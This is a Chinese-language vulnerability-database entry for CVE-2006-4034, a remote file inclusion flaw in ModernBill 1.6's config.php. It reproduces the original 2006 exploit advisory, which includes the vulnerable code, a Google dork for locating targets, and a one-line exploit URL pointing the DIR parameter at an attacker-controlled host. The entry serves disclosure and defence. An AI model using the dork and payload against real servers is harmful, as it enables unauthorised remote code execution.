Modernbill 'Config.PHP'远程文件包含漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1110764 漏洞类型 输入验证
发布时间 2006-08-07 更新时间 2006-08-15
CVE编号 CVE-2006-4034 CNNVD-ID CNNVD-200608-156
漏洞平台 PHP CVSS评分 7.5
|漏洞来源
https://www.exploit-db.com/exploits/2127
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200608-156
|漏洞详情
ModernGigabyteModernBill1.6的include/html/config.php脚本存在PHP远程文件包含漏洞,远程攻击者可借助DIR参数中的URL执行任意PHP代码。
|漏洞EXP
#############################SolpotCrew Community################################
#
# modernbill ver 1.6 (DIR) Remote File Inclusion
#
# Download file : http://freshmeat.net/projects/modernbill/
#
#################################################################################
#
#
# Bug Found By :Solpot a.k.a (k. Hasibuan) (03-08-2006)
#
# contact: chris_hasibuan@yahoo.com
#
# Website : http://www.solpotcrew.org/adv/solpot-adv-04.txt
#
################################################################################
#
#
# Greetz: choi , cow_1seng , Ibnusina , Lappet_tutung , h4ntu , r4dja ,
# L0sTBoy , Matdhule , setiawan , barbarosa, NpR , Fungky , Blue|spy
# home_edition2001 , Rendy ,Tje , m3lky , no-profile , bYu
# and all crew #mardongan @ irc.dal.net
#
#
###############################################################################
Input passed to the "DIR" is not properly verified
before being used to include files. This can be exploited to execute
arbitrary PHP code by including files from local or external resources.

code from include/html/config.php

//include($DIR."include/misc/mod_sessions/session_functions.inc.php");
#session_set_save_handler("sess_mysql_open","","sess_mysql_read","sess_mysql_write","sess_mysql_destroy","sess_mysql_gc");
//session_start();
session_register("set_language");
session_register("v");
$new_language = ($set_language) ? $set_language : NULL ;
$signup_form = TRUE;
include_once($DIR."include/functions.inc.php");
## ------------------------------------------------------
## DO NOT CHANGE STOP
## ------------------------------------------------------

google dork : allinurl:/modernbill/

exploit: http://somehost/modernbill/include/html/config.php?DIR=http://evilcode

##############################MY LOVE JUST FOR U RIE#########################
######################################E.O.F##################################

# milw0rm.com [2006-08-07]
|参考资料

来源:XF
名称:modernbill-config-file-include(28207)
链接:http://xforce.iss.net/xforce/xfdb/28207
来源:MISC
链接:http://www.solpotcrew.org/adv/solpot-adv-04.txt
来源:BID
名称:19335
链接:http://www.securityfocus.com/bid/19335
来源:BUGTRAQ
名称:20060803SolpotCrewAdvisory#5-modernbillver1.6(DIR)RemoteFileInclusion
链接:http://www.securityfocus.com/archive/1/archive/1/442126/100/0/threaded